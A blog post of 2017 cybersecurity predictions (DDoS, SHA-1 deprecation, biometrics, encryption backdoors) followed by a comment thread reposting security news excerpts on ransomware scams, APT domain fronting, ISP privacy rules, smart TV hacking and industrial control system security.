Year 2017 will not have any turn towards better data security. The internet is rife with such well-known than the unknown threats. The company’s systems are supposed to be protected.Hackers are going to continue to look for new ways to extort and steal information from businesses and organizations, which unfortunately means those businesses and organizations will have to continue to look for new ways to protect themselves.
Critical infrastructure cames under attack in 2017. Critical infrastructures must be better protected from criminals and terrorists who take advantage of modern technologies that are essential for the functioning of society and the economy. IT security functions of industrial control systems (ICS), energy grids and IoT networks needs to be improved in 2017.
There is push for better web security in 2017. Starting New Year’s Day, Google’s Chrome will begin labeling as “insecure” all websites that transmit passwords or ask for credit card details over plain text HTTP. Beginning in January 2017 (Chrome 56), HTTP sites that transmit passwords or credit cards are marked as non-secure, as part of a long-term plan to mark all HTTP sites as non-secure.
SHA-1 is insecure. Starting on Jan 1, 2017, most CAs will migrate to SHA-2 certificates, and major browser makers have already announced plans to adopt the change, including Microsoft, Google, and Mozilla. Their browsers will no longer trust sites that use SHA-1 starting with that date, and they will mark these websites as insecure. 1/3 of Websites Use SHA-1 Certificates Despite Looming Deadline. SHA-1 will still hang around, like a fart in a spacesuit, for many years to come because some people are lazy enough not to make the change.
There will be changes in how security is viewed in 2017 by businesses. We will likely see cloud adoption continue to grow across the United States, network visibility will no longer just be an option, AI and machine learning will shake old security models, and IoT-powered attacks will continue to rise. All of this will factor into how businesses set up, monitor and secure their networks.
The Commoditization of Cyberattacks Will Make Them More Frequent in 2017. More and more companies suffer from disruption to business due to cyber attacks. Cyber-attacks cause companies significant financial losses, but the studies shows that companies are not prepared for attacks. According to Gartner, by 2018 only 40 per cent of large companies have official plans in case of cyber attacks. Last year, the percentage was zero.
Strap yourself in for a bumpy ride in 2017. 2016 sucked. 2017 won’t be much better, sorry. DDoS attacks have been around since at least 2000, and they’re not going away. In fact, as the number of devices online grows, the volume and velocity of these attacks is also increasing. DDoS attack toolkits have been around for years, as have services that will enable you to pay for an attack. Expect to see more of them. It seems that 2017 promises to be the most dramatic year yet in DDoS conflict. Whale-sized DDoS attacks will increase, the IoT will become a bigger factor in DDoS and DDoS will overshadow ransomware attacks and is used for extortion. Expect to see the Internet of Things (IoT) and other connected devices play an important part in these attacks.
Biometric identification will become more common in 2017, but it will not replace passwords. Fingerprint identification has become increasingly common in smartphones and already the technology is fast and reliable. This year biometric identification devices were sold for 4.5 billion dollars (most of them go to smart phones and laptops). 91 percent of biometric sales were fingerprint sensors, four per cent of face detection and three per cent iris detection.
Biometrics Won’t Kill Passwords any time soon. Even though PIN codes and passwords are actually pretty lousy protection case against skilled cybercriminal, the password will never disappear entirely, as two per cent of the world’s population is persons with a fingerprint not suitable for biometric identifier to work. Other biometric identification systems have also similar limitations and/or are not yet commonly available at reasonable cost. While biometrics, including fingerprint-, face-, iris-, palm- and speech-recognition, will continue to grow as a more secure substitute for passwords, they will not render passwords obsolete. Until the other common biometrics become commonplace, passwords are here to stay until circa 2030.
Fights with encryption and backdoors for them is not over in 2017. Many public figures in law enforcement have consistently argued that device encryption presents a new threat to police powers of investigation. On the other side House Judiciary Committee’s Encryption Working Group report says encryption backdoors pose a security threat, siding with tech experts in their latest report . The problem is that any system allowing police to get into those encrypted system (let it be phone, computer or communications) could also be exploited by criminals. Any action in this space should weigh any short-term benefits against the longterm impacts. Many industry experts will rightly tell you there is no such thing as partial data encryption. You either have a fully capable system or none at all.
Given the security events of 2016, coupled with the rapid advancements and adoption of cloud computing, 2017 will be the year in which many finally accept that network infrastructure and security will have to be rethought from the ground up. In 2017 the cloud will become a risk for users: The cloud becoming insecure – extortion and IoT openings.
The rivalry between the network attacks and network security is in acceleration. Crippling Internet services with denial of service attacks are becoming more common throughout the world. DDoS attacks have been around since at least 2000, and they’re not going away. In fact, as the number of devices online grows, the volume and velocity of these attacks is also increasing. IoT-powered attacks will continue to rise and stopping the attack is not easy. For most companies the key thing is that the attack traffic is stopped before it reaches the company’s Internet connection or servers (needs to use telecom operator and external services increase). In addition to service disturbion Denial of Service Attacks are often used as distraction during the actual data burglary.DDoS may take over from ransomware as a cause for concern.
In 2017 the IT and security professionals talk about more about business risks. Historically, firewalls, DLP, antivirus, SIEM and other technical point solutions have been the centerpiece of security conversations, but the mindset is slowly shifting from technology to risk. The goal of stopping all attacks and preventing all business impact has been recognized as a fool’s errand, and has shifted to measuring risk and minimizing business impacts. Cyber security is increasingly being viewed as a risk management problem.
In 2017 ‘Security’ Must be Added to our Existing Ethical and Philosophic Concerns Over Artificial Intelligence and Algorithms. Algorithms soon run the world. They present problems that are seriously questioned on both ethical and philosophic grounds; and they have become the basis of fictional Armageddons.
Cyber insurance will be more thoughs as on solution for handling cyber risks in 2017. The global cyber insurance market is expected to generate $14 billion by 2022, according to a new report published by Allied Market Research (AMR). That figure represents an impressive compound annual growth rate (CAGR) of nearly 28% from 2016 to 2022.
In 2017 Big Brother will be watching you 24/7.Those of you who’ve read George Orwell’s book 1984 or seen the movie ,will remember how the citizens of the fictitious totalitarian state of Oceana are constantly under surveillance by order of its dictator, Big Brother. So now swap your home desktop computer, laptop or smart phone for the fictitious telescreen and not only are you sitting in front of what is a modern day version of the Big Brother telescreen you are also walking around with one in your pocket or handbag. Sound a bit far fetched to you? Well it’s set to become a reality in many countries.
Users will want better security or at least to feell more secure in 2017. Many people are prepared to to extremes for better security. According to a recent survey of over 2,000 adults conducted by Harris Poll Nearly 40% of Americans Would Give Up Sex for a Year or eating their favourite food in Exchange for Better Online Securit, meant they’d never have to worry about being hacked. When you consider that 87 percent of U.S. adults use the internet, it makes sense that cyber security is one of the biggest concerns today. The single biggest thing people can do to help keep their online identity safe is probably the easiest – a solid password – and not giving it to other people. Still nearly 50% of people have shared a password to an e-mail account or to an account like Netflix.
Security Becomes A Multi-System Issue and more people talking about the issue. Design teams will have to bake strategies in from the start, no matter how insignificant the device.The good news is that it more people talking about the issue. The real challenge is packing enough security features into designs to prevent security breaches of every sort, including those that can come from other electronics that weren’t even considered as part of the design process. Just as devices get more sophisticated, so do hackers.The reality is that security breaches can even cause physical harm. It’s time to look at this at a multi-system, multi-disciplinary level. Otherwise, we literally could be playing with fire.
Block chains have been a big trend for several years. The block chain market is divided now when 2017 starts. During the autumn 2016, we have seen a number of initiatives on cooperation between the financial sector and consulting companies. Microsoft has chosen a platform for Ethereum-block chain and offers it to the Azure cloud service. IBM has jumped Hyperledger consortium bandwagon and offering their own block chains to Bluemix service. Google and Amazon still shine by their absence. Even banks may prefer to see the use of cloud for the block chains.
Other prediction articles worth to look:
What Lies Ahead for Cybersecurity in 2017?
Network Infrastructure, Visibility and Security in 2017
DDoS in 2017: Strap yourself in for a bumpy ride
Cybersecurity Industry Outlook: 2017 to 2021 | CSO Online
IBM’s Cybersecurity Predictions for 2017 – eForensics
https://eforensicsmag.com/ibms-cybersecurity-predictions-2017/
Top 5 Cybersecurity Threats to Watch Out for in 2017
Experts Hopeful as Confidence in Risk Assessment Falls
3,151 Comments
Tomi Engdahl says:
Mac security facts and fallacies
https://blog.malwarebytes.com/101/2017/03/mac-security-facts-and-fallacies/?utm_source=double-opt-in&utm_medium=email-internal-b2c&utm_campaign=EM-B2C-2017-March-newsletter-issue1&utm_content=mac-facts-fallacies
There are many Mac security myths circulating among users. So how can you tell if the advice you’re reading is fact or fallacy? Read on to find out!
Fallacy: Macs don’t get viruses
Fact: There’s not much Mac malware out there
Fallacy: Macs are more secure than Windows
Fact: macOS has built-in anti-malware software
Fallacy: Macs don’t need security software
Tomi Engdahl says:
Ransomware scammers exploited Safari bug to extort porn-viewing iOS users
Apple fixes flaw attackers used to trick uninformed users into paying a fine.
https://arstechnica.com/security/2017/03/ransomware-scammers-exploited-safari-bug-to-extort-porn-viewing-ios-users/
Ransomware scammers have been exploiting a flaw in Apple’s Mobile Safari browser in a campaign to extort fees from uninformed users. The scammers particularly target those who viewed porn or other controversial content. Apple patched the vulnerability on Monday with the release of iOS version 10.3.
The flaw involved the way that Safari displayed JavaScript pop-up windows.
March 27, 2017
Mobile Safari scareware campaign thwarted
https://blog.lookout.com/blog/2017/03/27/mobile-safari-scareware/
Today, Apple released an update to iOS (10.3) that changed how Mobile Safari handles JavaScript pop-ups, which Lookout discovered scammers using to execute a scareware campaign.
The scammers abused the handling of pop-up dialogs in Mobile Safari in such a way that it would lock out a victim from using the browser. The attack would block use of the Safari browser on iOS until the victim pays the attacker money in the form of an iTunes Gift Card. During the lockout, the attackers displayed threatening messaging in an attempt to scare and coerce victims into paying.
However, a knowledgeable user could restore functionality of Mobile Safari by clearing the browser’s cache via the the iOS Settings — the attack doesn’t actually encrypt any data and hold it ransom.
Tomi Engdahl says:
Smart phone viruses to five times more
Nokia prepares twice a year mobile data security report and the latest version is chilling to read. the number of smart phone malware increased by 400 per cent from beginning of 2016.
Nokia -document Threat Intelligence Report shows that in October to 1.35 per cent of all mobile devices were infected. Quantity is the largest fair in the report on the five-year history.
Last year’s second half of the number of smartphone infections increased by 83 per cent compared to the beginning of the year. Four out of five of infection strikes for Android, but also iOS devices have risen to the ranks of objects. Windows PCs have fallen to four per cent.
Source: http://www.etn.fi/index.php/13-news/6074-alypuhelinviruksia-viisi-kertaa-aiempaa-enemman
More:
Nokia Threat Intelligence Report – 2H 2016
The latest report reveals a 400% increase in the smart phone infection rate in the past 12 months.
https://pages.nokia.com/8859.Threat.Intelligence.Report.html
Tomi Engdahl says:
Microsoft pulls then revives Docs.com search after complaints of exposed sensitive files
http://www.zdnet.com/article/microsoft-yanks-docs-com-search-after-complaints-of-exposed-sensitive-files/
Security experts pointed to numerous sensitive and personal files found on Microsoft’s document sharing site, which lets users share documents publicly by default.
Tomi Engdahl says:
Russian Hackers Domain Fronting
http://hackaday.com/2017/03/28/russian-hackers-domain-fronting/
FireEye just put out a report on catching the Russian hacker group “Advanced Persistent Threat 29” (APT29, for lack of a better code name) using the meek plugin for TOR to hide their traffic.
Anyway, meek was invented to help bring the uncensored Internet to people who live in oppressive regimes, and now cybersecurity researchers have observed it being used by Russian state hackers to hide their tracks. Sigh. Technology doesn’t know which side it’s on — the same backdoor that the FBI wants to plant in all our communications can be used by the mafia just as easily. Plugins that are meant to bring people freedom of speech can just as easily be used to hide the actions of nation-state hackers.
APT29 Domain Fronting With TOR
https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html
Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years. There has been considerable discussion about domain fronting following the release of a paper detailing these techniques. Domain fronting provides outbound network connections that are indistinguishable from legitimate requests for popular websites.
APT29 has used The Onion Router (TOR) and the TOR domain fronting plugin meek to create a hidden, encrypted network tunnel that appeared to connect to Google services over TLS. This tunnel provided the attacker remote access to the host system using the Terminal Services (TS), NetBIOS, and Server Message Block (SMB) services, while appearing to be traffic to legitimate websites. The attackers also leveraged a common Windows exploit to access a privileged command shell without authenticating.
Tomi Engdahl says:
Gigi Sohn / The Verge:
Former FCC staffer explains consequences as House of Representatives prepares to vote to repeal FCC’s 2016 broadband privacy rules
You have just hours to stop Congress from giving away your web browsing history
Time to make some calls
http://www.theverge.com/2017/3/27/15073162/fcc-broadband-internet-privacy-rules-congress-vote
Last week, on a party-line vote, the Senate voted to repeal the Federal Communications Commission’s 2016 broadband privacy rules giving consumers the power to choose how their ISPs use and share their personal data. Today, the House of Representatives will vote, and if the House also votes to repeal the rules, the bill will go to President Trump, who is expected to sign it.
The consequences of repeal are simple: ISPs like Comcast, AT&T, and Charter will be free to sell your personal information to the highest bidder without your permission — and no one will be able to protect you. The Federal Trade Commission has no legal authority to oversee ISP practices, and the bill under consideration ensures that the FCC cannot adopt “substantially similar” rules.
unless the bill fails in the House, the nation’s strongest privacy protections will be eliminated and the FCC cannot revive them
Tomi Engdahl says:
Karl Bode / DSLreports:
House passes resolution that lets ISPs sell customers’ browsing history without user permission, 215 to 205 along party lines — As most had expected, the House of Representatives today voted 215 to 205 to kill privacy rules protecting US broadband subscribers.
The GOP Just Killed Consumer Broadband Privacy Protections
http://www.dslreports.com/shownews/The-GOP-Just-Killed-Consumer-Broadband-Privacy-Protections-139244
Now, with limited competition and ever-shrinking regulatory oversight, there’s arguably little to prevent ISPs from doing whatever they’d like with your personal information, including selling it to companies that may wind up using it against you. And no, just getting a VPN isn’t going to be enough to help consumers tackle the consumer privacy issues to come. Next up for giant ISPs and their Congressional allies: killing net neutrality, and eroding FCC and FTC oversight of giant broadband providers even further.
Tomi Engdahl says:
If You Want to Stop Big Data Breaches, Start With Databases
https://www.wired.com/2017/03/want-stop-big-data-breaches-start-databases/
Over the past few years, large-scale data breaches have become so common that even tens of millions of records leaking feels unremarkable. One frequent culprit that gets buried beneath the headlines? Poorly secured databases that connect directly to the internet.
While companies commonly use these databases to store tempting troves of customer and financial data, they often do so with outdated and weak default security configurations. And while any type of database can be left open or unprotected, a string of breaches over the last few years have all centered around one type in particular: open-source “NoSQL” databases, particularly those using the popular MongoDB database program.
MongDB and the other companies that make NoSQL databases don’t have control over how users set up and secure them.
That disconnect has led to extensive fallout.
The attacks have also not only continued, but evolved. At the beginning of 2017, a rash of “ransomware” incidents hit exposed MongoDB databases. In these cases attackers actually just deleted a database’s files, but made it seem like paying a Bitcoin ransom worth a few hundred dollars would trigger data restoration.
Open Source, Open Sesame
Security experts have been warning about NoSQL configuration insecurity for years, and MongoDB specifically has suffered from two issues. First, it used to have some problematic defaults, like not requiring password authentication and granting users overly broad privileges. MongoDB updated these configurations a few years ago. But, second, because MongoDB is open source, it’s easy to find installers online that incorporate outdated or misguided security settings. Someone who doesn’t have a lot of tech experience, or just isn’t paying attention, can easily wind up accessing and relying on flawed configuration files while setting up a database.
“It’s not as though attackers have exploited any flaw in these technologies, they haven’t exposed any flaw in MongoDB,”
Unprotected databases are also trivial to find. Both criminals and researchers alike use network visibility tools like the search engine Shodan, which indexes internet-connected devices, to get a sense of how many exposed databases are out there. Currently searching “MongoDB” on Shodan reveals more than 50,000 exposed databases. They may or may not be vulnerable to attack, but simply being visible increases their risk.
Tomi Engdahl says:
Hong Kong gov’t loses computers with personal data of all registered voters
https://www.hongkongfp.com/2017/03/27/just-hong-kong-govt-loses-computers-personal-data-registered-voters/
The Registration and Electoral Office (REO) confirmed on Monday evening that it lost two computers containing the personal data of all 3.7 million registered voters in the city.
The machines were being stored in a locked room at AsiaWorld-Expo, which was used as a backup polling station for Sunday’s chief executive election. The REO said the computers also contained the full names of the 1,194 Election Committee members who voted in the election.
The personal data included the names, addresses and identity card numbers of all registered voters in Hong Kong. The REO said the personal data was encrypted and there was no evidence that it had been leaked.
IT sector lawmaker Charles Mok said the “careless” mistake made by the REO officers was “unacceptable.”
Tomi Engdahl says:
Microservices and Security: Increasing security by increasing surface area
https://www.mulesoft.com/resources/api/microservices-security?utm_campaign=56c615b273a6a33fdf003f3c&utm_content=58d591c469082f30d7035fe0&utm_medium=smarpshare&utm_source=twitter
Tomi Engdahl says:
Encryp-xit: Europe will go all in for crypto backdoors in June
App-makers get a choice: Open up voluntarily or we’ll pass laws forcing you to
https://www.theregister.co.uk/2017/03/30/ec_push_encryption_backdoors/
The European Commission will in June push for backdoor access to encryption used by apps, according to EU Justice Commissioner Věra Jourová.
Speaking publicly, and claiming that she has been pushed by politicians across Europe, Jourová said that she will outline “three or four options” that range from voluntary agreements by business to strict legislation.
The EC’s goal is to provide the police with a “swift and reliable” way to discover what users of encrypted apps have been communicating with others.
“At the moment, prosecutors, judges, also police and law enforcement authorities, are dependent on whether or not providers will voluntarily provide the access and the evidence. This is not the way we can facilitate and ensure the security of Europeans, being dependent on some voluntary action,” Jourová said, according to EU policy site Euractiv.
And one day after the March 22 murderous attack in the heart of London, the UK government was publicly critical of the failure of companies like Google and Facebook to remove extremist content on the internet, arguing that they “can and must do more.”
That was followed shortly after by UK Home Secretary Amber Rudd specifically highlighting Facebook-owned chat app WhatsApp and arguing that the authorities must be given access to messages sent by the Westminster attacker over the service.
The debate over encryption has been going on for well over a year and until recently was dominated by fights in the United States, most notably between the FBI and Apple over access to an iPhone used by a shooter in San Bernardino, California.
Tomi Engdahl says:
Your internet history on sale to highest bidder: US Congress votes to shred ISP privacy rules
As House passes law, here’s what you should do about it
https://www.theregister.co.uk/2017/03/28/congress_approves_sale_of_internet_histories/
The US House of Representatives has just approved a “congressional disapproval” vote of privacy rules, which gives your ISP the right to sell your internet history to the highest bidder.
The measure passed by 215 votes to 205.
This follows the same vote in the Senate last week. Just prior to the vote, a White House spokesman said the president supported the bill, meaning that the decision will soon become law.
This approval means that whoever you pay to provide you with internet access – Comcast, AT&T, Time Warner Cable, etc – will be able to sell everything they know about your use of the internet to third parties without requiring your approval and without even informing you.
Your ISP already knows quite a lot about you: your name and address, quite possibly your age, and a host of other personally identifiable information such as your social security number. That’s on the customer information side. On the service side, they know which websites you visit, when, and how often.
That information can be used to build a very detailed picture of who you are: what your political and sexual leanings are; whether you have kids; when you are at home; whether you have any medical conditions; and so on – a thousand different data points that, if they have sufficient value to companies willing to pay for them, will soon be traded without your knowledge.
As one high-profile venture capitalist recently discovered, your previous search history can also impact what result you see in future.
Impact
It is difficult to underestimate the impact that the shift away from data privacy to open season on personal information sales may have. With cable companies now given strong financial incentive to draw on user information and habits, and with the stick of regulatory intervention effectively thrown away, it may result in significant societal changes.
The irony is that just a few months ago the situation was the polar opposite.
When US comms watchdog the FCC controversially declared that broadband providers were “common carriers” along the same lines as telephone companies, one of the many impacts was that it pulled enforcement of data privacy rules away from US trade watchdog the FTC and gave it to the FCC (which has very limited experience in consumer issues).
What are we looking at in reality?
So, setting aside hyperbole or extrapolation, what does this actually mean for end users? What can ISPs really see? And what can they really sell?
Well, at the moment, it gives them the right to effectively sell ads like Facebook and Google. Both these companies build up a huge amount of information on individual users and then sell them. They sell the data in aggregate and keep a tight control on the fine details.
ISPs now have this power too. Except they have one huge advantage: they don’t have to get you to log or opt into anything.
your ISP sees everything you are doing because its service is your very internet connection. Even if you use the “incognito” mode that many browsers offer where you can’t be tracked by cookies, your ISP can still see where you are going because it has to go get the information from the websites you are looking at.
Content
Now, the really big question is: can your ISPs see the content of your online interactions? Can it read your emails? Can it read your search results? Can it store and search through the words you typed into a webpage?
And the answer is: yes, sometimes.
If the website you visit is not secured with HTTPS – meaning that any data between you and the website is encrypted – then your ISP can see exactly what you are doing.
Now, this scary reality is tempered by two things: first, a majority of websites these days, especially big ones, use HTTPS. And second, it is a lot of hassle for ISPs to take this enormous quantity of information and make something valuable out of it.
In short, it is not worth the cost of searching through your (and millions of others’) web traffic to find information that they can sell. What they make from that will not cover the costs of searching. But that may change with this Congressional vote: the economics may shift in favor of searching that traffic.
It is a certainty that ISPs will run experiments to see if they can make money from digging into this information. Pharmaceutical companies in particular pay a lot of money for information on users looking for specific drugs
So, the logical question is: what can you do about it?
What can you do today, right now, on your computer to limit what other companies can do with your data?
We have five general suggestions:
1. Use Tor or a VPN
2. Use a different search engine
3. Log out and/or use two browsers at the same time
4. Use HTTPS
5. Call your ISP and ask them about opting out
Tomi Engdahl says:
Kremlin-backed APT28 doesn’t even bother hiding its attacks, says Finnish secret police
Supo: Espionage rising, attacks on infrastructure falling
https://www.theregister.co.uk/2017/03/30/kremlinbacked_apt28_doesnt_hide_its_attacks/
The Finnish Security Intelligence Service Supo is complaining that nation-state-level attackers aren’t even bothering to hide themselves from prying eyes.
That news comes in the agency’s review of intelligence activity in 2016, announced here.
The major trends in cyber-intelligence Supo highlights in the report are increasing attacks against Finland’s foreign and security infrastructure, espionage attempts, and actors abusing Finnish data networks “in espionage targetting third countries.”
On the other hand, attacks against critical infrastructure fell sharply in 2016.
Regarding attempts to compromise the country’s “foreign and security policy,” the report notes: “Most observations were related to an APT28/Sofacy attack in which no particular effort was made to conceal the activity … It is justified to assume that also the number of cases which have not come to the authorities’ knowledge has increased.”
APT28 has been blamed for attacks on Georgia, Eastern Europe, NATO, the Organization for Security and Co-operation in Europe, and in 2014, FireEye went public linking the group to the Kremlin.
Other tags hung on the group are Sofacy, Pawn Storm and Fancy Bear.
http://www.supo.fi/tiedotteet/1/0/supon_vuosikirja_2016_on_julkaistu_72854
Tomi Engdahl says:
About 90% of Smart TVs Vulnerable To Remote Hacking Via Rogue TV Signals
https://entertainment.slashdot.org/story/17/03/29/2018240/about-90-of-smart-tvs-vulnerable-to-remote-hacking-via-rogue-tv-signals
A new attack on smart TVs allows a malicious actor to take over devices using rogue DVB-T (Digital Video Broadcasting — Terrestrial) signals, get root access on the smart TV, and use the device for all sorts of nasty actions, ranging from DDoS attacks to spying on end users. The attack, developed by Rafael Scheel, a security researcher working for Swiss cyber security consulting company Oneconsult, is unique and much more dangerous than previous smart TV hacks. Scheel’s method, which he recently presented at a security conference, is different because the attacker can execute it from a remote location, without user interaction, and runs in the TV’s background processes, meaning users won’t notice when an attacker compromises their TVs.
About 90% of Smart TVs Vulnerable to Remote Hacking via Rogue TV Signals
https://www.bleepingcomputer.com/news/security/about-90-percent-of-smart-tvs-vulnerable-to-remote-hacking-via-rogue-tv-signals/
Current smart TV hacks aren’t not really “dangerous”
Until now, all smart TV exploits relied on attackers having physical access to the device, in order to plug in an USB that executes malicious code. Other attacks relied on social engineering, meaning attackers had to trick users into installing a malicious app on their TV.
Even the mighty CIA developed a hacking tool named “Weeping Angel,” which could take over Samsung smart TVs and turn them into spying devices. But despite its considerable human and financial resources, the CIA and its operators needed physical access to install Weeping Angel, which made it less likely to be used in mass attacks, and was only feasible if deployed on one target at a time, during carefully-planned operations.
Because of the many constraints that come with physical and social engineering attacks, Scheel didn’t consider any of them as truly dangerous, and decided to create his own.
Scheel’s attack is remote, no user interaction needed
Scheel’s method, which he recently presented at a security conference, is different because the attacker can execute it from a remote location, without user interaction, and runs in the TV’s background processes, meaning users won’t notice when an attacker compromises their TVs.
Furthermore, Scheel says that “about 90% of the TVs sold in the last years are potential victims of similar attacks,” highlighting a major flaw in the infrastructure surrounding smart TVs all over the globe.
At the center of Scheel’s attack is Hybrid Broadcast Broadband TV (HbbTV), an industry standard supported by most cable providers and smart TV makers that “harmonizes” classic broadcast, IPTV, and broadband delivery systems. TV transmission signal technologies like DVB-T, DVB-C, or IPTV all support HbbTV.
Scheel says that anyone can set up a custom DVB-T transmitter with equipment priced between $50-$150, and start broadcasting a DVB-T signal.
Rogue TV signals could deliver malicious HbbTV commands
Scheel developed two exploits he hosted on his own website, which when loaded in the TV’s built-in browser would execute malicious code, gain root access, and effectively take over the device.
For his first exploit, Scheel used CVE-2015-3090, which is one of the Flash zero-days leaked in the Hacking Team 2015 incident. After coding and successfully testing the exploit, Scheel realized that not all smart TV browsers come with the Flash Player plugin enabled by default.
Because of this, Scheel developed a second exploit, which exploited an older vulnerability in the Array.prototype.sort() JavaScript function, support by all browsers, even by those shipped with smart TVs.
Tomi Engdahl says:
DJI Proposes New Electronic ‘License Plate’ For Drones
https://tech.slashdot.org/story/17/03/28/213236/dji-proposes-new-electronic-license-plate-for-drones
Chinese drone maker DJI proposed that drones be required to transmit a unique identifier to assist law enforcement to identify operators where necessary. Anyone with an appropriate receiver could receive the ID number, but the database linking the ID with the registered owner would only be available to government agencies. DJI likens this to a license plate on a car and offers it as a solution to a congressional mandate that the FAA develop methods to remotely identify drone operators.
Tomi Engdahl says:
http://breachlevelindex.com/assets/Breach-Level-Index-Infographic-2016-Gemalto-1500.jpg?utm_source=press-release&utm_medium=infographic&utm_term=bli&utm_content=bli-infographic&utm_campaign=bli-2016-full-report
Tomi Engdahl says:
Every second, 44 stolen informatio
The data security company Gemalto has drawn up a report on last year’s data thefts. the amount of information has been compromised is dramatic. Every second, 44 stolen information, Gemalto statistics tell.
Last year, hackers took a total of 1.4 billion data entries from large databases. Hacking into databases was 1792. In the wrong hands had to 86 percent more information than in the previous year.
59 per cent of misappropriated data was the so-called. Identity Theft. What is worrying is the fact that more than half of the data theft was not initially clear how much data had been the aggressors nails.
Gemalto BLI-index (Breach Index Level), according to the post-2013 into the wrong hands has had over 7 billion data records. This means about 3 million every day, about 2,623 every minute and 44 about every single second.
Source: http://www.etn.fi/index.php/13-news/6084-joka-sekunti-varastetaan-44-tietoa
More:
http://breachlevelindex.com/assets/Breach-Level-Index-Infographic-2016-Gemalto-1500.jpg?utm_source=press-release&utm_medium=infographic&utm_term=bli&utm_content=bli-infographic&utm_campaign=bli-2016-full-report
Tomi Engdahl says:
Russian Hackers Domain Fronting
http://hackaday.com/2017/03/28/russian-hackers-domain-fronting/
FireEye just put out a report on catching the Russian hacker group “Advanced Persistent Threat 29” (APT29, for lack of a better code name) using the meek plugin for TOR to hide their traffic. If you’re using meek with meek-reflect.appspot.com, you’ll find it’s been shut down. If all of this is gibberish to you, read on for a breakdown
https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html
Tomi Engdahl says:
2017: The Year of the Dishwasher Security Patch
http://hackaday.com/2017/03/28/2017-the-year-of-the-dishwasher-security-patch/
As if Windows Update wasn’t bad enough, one has to deal with a plethora of attention-hungry programs and utilities all begging for a continual stream of patches from the Internet. It’s exhausting, but unfortunately also par for the course. Many of these updates are to close security vulnerabilities that could otherwise expose your computer to undesirables. The Internet of Things will only expand the amount of hardware and software you need to keep updated and protected on a daily basis. Now, it’s your dishwasher that’s under attack.
The Register reports that Jens Regel discovered the bug in a Miele dishwasher with a webserver. It’s a basic directory traversal attack that can net the intruder the shadow password file. Armed with this, it’s simple to take over the embedded Linux system and wreak havoc on your local network.
Dishwasher has directory traversal bug
Thanks a Miele-on for making everything dangerous, Internet of Things firmware slackers
https://www.theregister.co.uk/2017/03/26/miele_joins_internetofst_hall_of_shame/
Tomi Engdahl says:
Current issues in industrial cybersecurity
Ransomware is as loathsome as it sounds; programmable logic controllers (PLCs) seen as likely targets.
http://www.controleng.com/single-article/current-issues-in-industrial-cybersecurity/0b6e85d1bc4470214766f201aa816d5c.html
A meteoric rise in ransomware attacks in the past year is disturbing news for engineers in manufacturing and production environments. Ransomware, as you might imagine, is a kind of malicious software used by criminals to prevent access to a computing system until their demands are met.
Executing a ransomware attack doesn’t take programming skills per se, as kits for committing such attacks are readily available today in some the Internet’s darker corners, either for free or for a small fee.
Tomi Engdahl says:
Mobile safety strategy: Six things to consider
Combine smart devices with flexible technology to provide real-time alerts.
http://www.controleng.com/single-article/mobile-safety-strategy-six-things-to-consider/c2a5cde4a24aca86c22f945ef0a326c8.html
Organizations go through significant evolutions in many areas of their businesses. The technical challenges in managing risks around workplace safety are similar in many respects to other parts of the enterprise: there is software to minimize the hurdles that impede getting information from a source into a system which in turn enables the right people to make informed, proactive and actionable decisions.
Archaic environmental health and safety (EHS) programs rely on employees to collect data manually, transpose the information into spreadsheets or disparate, disconnected software products-or worse yet, paper binders-and perpetually repeat this process. Such programs may suffice in meeting minimum regulatory standards, but they typically fall short due to human error and the sheer quantity of information involved. Absent adequate software, actionable intelligence is not available to inform proactive decision-making and preventive actions.
Mobile devices integrated with EHS tools to leverage real-time connectivity, native apps, and easy in-the-field data entry, are game changing.
Tomi Engdahl says:
Safety requires cybersecurity
http://www.controleng.com/single-article/safety-requires-cybersecurity/1dc4479aa9b2e5886ab582698c5a419a.html
Technology Update: If it isn’t secure, it isn’t safe. Cybersecurity vulnerabilities represent additional failure modes and safety incidents not factored into traditional safety assessments. Consider safety when creating a business justification for cybersecurity risk assessments.
Functional safety assessments are a well-established practice in machine and process automation. These assessments focus on random hardware failures or systematic software failures (such as bugs).
However, cybersecurity threats and vulnerabilities represent additional failure modes that may lead to incidents that are unaccounted for in traditional safety assessments. A business justification can be developed for discussing cyber risk assessments.
The majority of factories and process plants today are controlled and operated by automation systems built on Ethernet TCP/IP networks and legacy Microsoft operating systems. These systems are vulnerable to cybersecurity breaches resulting in potentially significant risks, including risks to health, safety and the environment. To address the risk, there’s a need to understand it—but how? Functional safety assessments focus on random hardware failures or systematic software failures (such as bugs) and generally do not consider cyber threats or cyber vulnerabilities. To understand cyber risk, it’s necessary to perform cyber vulnerability assessments and cyber risk assessments. Not surprisingly, this is exactly what cybersecurity standards and regulations require.
ICS cybersecurity vulnerability assessment
Figure 2: A cybersecurity vulnerability assessment also requires partitioning the system into zones and conduits. Courtesy: aeSolutionsVulnerabilities are a key variable in cyber risk. In theory, if there are no cyber vulnerabilities there is no cyber risk. Of course, in reality all ICSs have vulnerabilities, some more than others. The number and severity of vulnerabilities depends on the components used, how they are configured and how they are networked.
So what is an ICS cybersecurity vulnerability assessment? It is an evaluation of a ICS design. In a brownfield design begin with the ICS as-built or as-found drawings. An example is shown in Figure 1.
How is that control system constructed? What devices make up the system? How are they networked together? How do those networks communicate? Modern control systems are based on Ethernet networking and Microsoft operating systems. Understanding how these pieces go together can be very difficult in many facilities. Drawings that show the entire system architecture may not exist; these systems often have grown and evolved over decades.
Start with an analysis of network communications to understand how these networks are constructed and, and how data moves throughout the system. This is done by recording actual network traffic and plotting it out to see the data flows.
Identify what devices are communicating with each other. What devices should be communicating with each other? What devices are communicating with each other that perhaps should not be, or were not expected to be? Are any devices communicating using unexpected protocols? Are there control system devices that are trying to communicate to the Internet? Plot the communications and look for anomalous behaviors.
A vulnerability assessment would then analyze the actual servers and workstations that make up the system. Most of the operating systems that are controlling the bulk of industrial facilities today are legacy Microsoft platforms such as XP and Windows Server 2003
The next step in a vulnerability assessment would be to partition the system into zones and conduits
A vulnerability assessment also should include a review of policies and procedures, and include a gap analysis. How does the system stack up against industry standards and best practices? Finally, the assessment should list the vulnerabilities that have been discovered and the recommended mitigations to close the gaps.
Tomi Engdahl says:
Beware—the Microwave May be Listening!
http://mwrf.com/blog/beware-microwave-may-be-listening?NL=MWRF-001&Issue=MWRF-001_20170330_MWRF-001_570&sfvc4enews=42&cl=article_1_b&utm_rid=CPG05000002750211&utm_campaign=10389&utm_medium=email&elq2=738388b652d9471793168c138ea2cb79
